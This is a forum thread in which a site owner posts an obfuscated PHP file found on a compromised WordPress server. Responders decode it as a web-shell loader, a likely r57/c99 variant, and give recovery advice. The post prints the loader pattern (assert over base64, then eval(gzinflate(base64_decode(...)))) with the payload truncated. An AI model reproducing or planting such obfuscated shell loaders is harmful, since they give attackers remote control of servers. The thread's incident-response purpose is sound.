Found an odd file we didn't create in one of our directories.
It was named ".moreinfoege.php.KJt" In the directory we also had a file called moreinfo.php
We've been having server issues lately (WordPress hacks, DDoS attack) so we're obv on high alert for other infiltrations. Is this a hack? What are some of the ways it could have gotten in?
Here's what its contents looked like (long gibberish string abbreviated to fit here):
<?php $IRdphe='as';$lgOULt='e';$UXkpWY=$IRdphe.'s'.$lgOULt.'r'.'t';$kOUHAp='b'.$IRdphe.$lgOULt.(64).'_'.'d'.$lgOULt.'c'.'o'.'d'.$lgOULt;@$UXkpWY(@$kOUHAp('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiNWIzcGVsczNzaTc4TzNtZTNNUHlNcnNwZFNocXNHekhsRVVQa3B6NHRHeTVMYVhUT1pJUFEzR1EyT0xVSEN3NzNqblgvcjF2VlFFTElCYzEyRW4zMmZ2eklKRVlDb1ZDb1ZBb0ZBcWQ5bEpuUEc1TmxncTF0M3QvKzNIdjhPaTQrT3JYUnJ2MTl1Zk85NzNpdStYbFQxK1BXK054WjlDdmpTZjEwV1JwZWV2clRudXAxN3lQS204T1dQNm9jL2pYNGNIYlYyYy9vdnoyZHZGQi9XSDkvb1BUK3c4ZWJkNXJ0dGVhemMzNzdYWmpyZG5ZYkt6Zng0L2k4dGVmQ3JYRHZjUERsd2V2ajR0L3ZmaGYzYmQvTzJ0L2VOYi82ZS9EOFVIenhmOCtQVy84OEhxMGU3Zy8yWnYrV255M3ZiNzFHeHU5YzZ0YXdIdzQ2dlFuU2ZxNDJYbWZqQ2NmdTYzdDRuQXc3a3pRbTByOWREem9UaWV0clc2 [...] lY1V281TlEvZUhIMDB6Tld4L0hmb1RTTjg1d0liV3VKVWJPazFCdGNOOGtyOE9iZzdSSGZFWkFyUjRZenFCYnlSTHJGVTUrdDMvNC8iKSkpOw==')); ?>
The code is hiding that fact that it is doing
assert(base64_decode(of the text from 'ZXZ to W=='.The decoding of that text shows another strings which is doing another decode and decompression starting with
eval(gzinflate(base64_decode("5b3pe...Without the full code posted, I can't see what is at the end of the rabbit hole. You can use this site to decode each step:
http://www.webutils.pl/index.php?idx=base64 (NOTE: The text goes in the blue box.)
This link should help on the second part: http://www.tareeinternet.com/scripts/decrypt.php
UPDATE: Based on the complete file, this appears to be a variant of r57shell or c99shell. It provides a web interface into your server to do things such as performing command line operations and interacting with SQL data.
This site has an example of what it looks like: http://phpsecurity.wordpress.com/2007/11/08/what-does-a-phpshell-look-like/
This site has a blog post by someone who has also had the problem: http://basus.net/?p=19
It looks like PHP that's base64-encoded to make it harder to figure out what's going on - but it's hard to tell without access to both files in question. I'd be willing to bet large quantities of chocolate that your host is still compromised.
Depending on what kind of access the attackers managed to obtain previously and how you recovered from it, there may be access methods left behind.
I recommend you begin your recovery procedure - installing a new OS and restoring your website from a known good copy.
looks like a hack. one of recently popular ways of getting this sort of files is via ftp.
there is plenty of trojans capturing passwords from popular windows ftp clients [ eg total commander ]. credentials are reported to control nodes which either directly or from other infected machines append malicious js / php code to index file, upload malicious .htaccess files etc.
check creation date of the file, try talking with your hosting provider to get ftp logs around time when this file was uploaded.
to be on the safe side... - if it's wordpress - backup data, and code; remove all php files, review all templates, restore app from fresh version.